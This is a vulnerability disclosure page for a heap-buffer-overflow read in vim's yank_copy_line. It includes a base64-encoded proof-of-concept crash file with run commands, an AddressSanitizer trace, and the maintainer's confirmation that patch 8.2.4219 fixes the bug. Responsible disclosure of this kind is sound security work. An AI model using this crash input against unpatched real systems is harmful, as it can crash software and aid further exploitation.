Heap-based Buffer Overflow in vim/vim

Valid

Reported on

Jan 27th 2022


Description

Heap-buffer-overflow on read in yank_copy_line

This issue was created to separate this one and was fixed with Patch 8.2.4219.

Proof of Concept

Steps to reproduce:

echo -n c2lsIW5vcm0wbxSA/zAWenk= | base64 -d > heap_ow_poc3

vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc3 -c :qa!

Sanitizer output

==1937==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000722f at pc 0x000000c35e3a bp 0x7ffcb4567010 sp 0x7ffcb4567008
READ of size 1 at 0x60200000722f thread T0
    #0 0xc35e39 in yank_copy_line /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9
    #1 0xc30874 in op_yank /home/presler/fuzzing/vim_sanitized/src/register.c:1217:7
    #2 0xa7bffa in do_pending_operator /home/presler/fuzzing/vim_sanitized/src/ops.c:4027:9
    #3 0x9fef02 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1146:2
    #4 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
    #5 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
    #6 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
    #7 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #8 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #9 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
    #10 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
    #11 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
    #12 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #13 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #14 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
    #15 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
    #16 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
    #17 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
    #18 0x7fc84b9c50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x41db2d in _start (/home/presler/fuzzing/vim_sanitized/src/vim+0x41db2d)

0x60200000722f is located 1 bytes to the left of 2-byte region [0x602000007230,0x602000007232)
allocated by thread T0 here:
    #0 0x49626d in malloc (/home/presler/fuzzing/vim_sanitized/src/vim+0x49626d)
    #1 0x4c5c67 in lalloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:248:11
    #2 0x4c5c3d in alloc /home/presler/fuzzing/vim_sanitized/src/alloc.c:151:12
    #3 0x8aaf87 in set_indent /home/presler/fuzzing/vim_sanitized/src/indent.c:682:12
    #4 0xa50bca in shift_line /home/presler/fuzzing/vim_sanitized/src/ops.c:269:8
    #5 0x8b42e4 in change_indent /home/presler/fuzzing/vim_sanitized/src/indent.c:1302:2
    #6 0x643eea in ins_shift /home/presler/fuzzing/vim_sanitized/src/edit.c
    #7 0x63ae2f in edit /home/presler/fuzzing/vim_sanitized/src/edit.c:956:6
    #8 0xa3f602 in invoke_edit /home/presler/fuzzing/vim_sanitized/src/normal.c:7285:9
    #9 0xa40d1f in n_opencmd /home/presler/fuzzing/vim_sanitized/src/normal.c:6544:6
    #10 0xa27858 in nv_open /home/presler/fuzzing/vim_sanitized/src/normal.c:7664:2
    #11 0x9fedf7 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1120:5
    #12 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
    #13 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
    #14 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
    #15 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #16 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #17 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
    #18 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
    #19 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
    #20 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
    #21 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
    #22 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
    #23 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
    #24 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
    #25 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
    #26 0x7fc84b9c50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/presler/fuzzing/vim_sanitized/src/register.c:1477:9 in yank_copy_line
Shadow bytes around the buggy address:
  0x0c047fff8df0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8e00: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fff8e10: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fff8e20: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8e30: fa fa fd fd fa fa fd fa fa fa 01 fa fa fa 00 00
=>0x0c047fff8e40: fa fa 01 fa fa[fa]02 fa fa fa 05 fa fa fa fd fa
  0x0c047fff8e50: fa fa 02 fa fa fa 02 fa fa fa 00 fa fa fa 02 fa
  0x0c047fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1937==ABORTING
We are processing your report and will contact the vim team within 24 hours. 4 months ago
We have contacted a member of the vim team and are waiting to hear back 4 months ago
Bram Moolenaar validated this vulnerability 4 months ago
pres1er has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bram Moolenaar
4 months ago

Maintainer


As mentioned in the description, this was in another bug report and now separate, thus still a valid issue. And fixed in patch 8.2.4219, which includes a test based on the POC.

Bram Moolenaar confirmed that a fix has been merged on 44db82 4 months ago
Bram Moolenaar has been awarded the fix bounty
register.c#L1477 has been validated
to join this conversation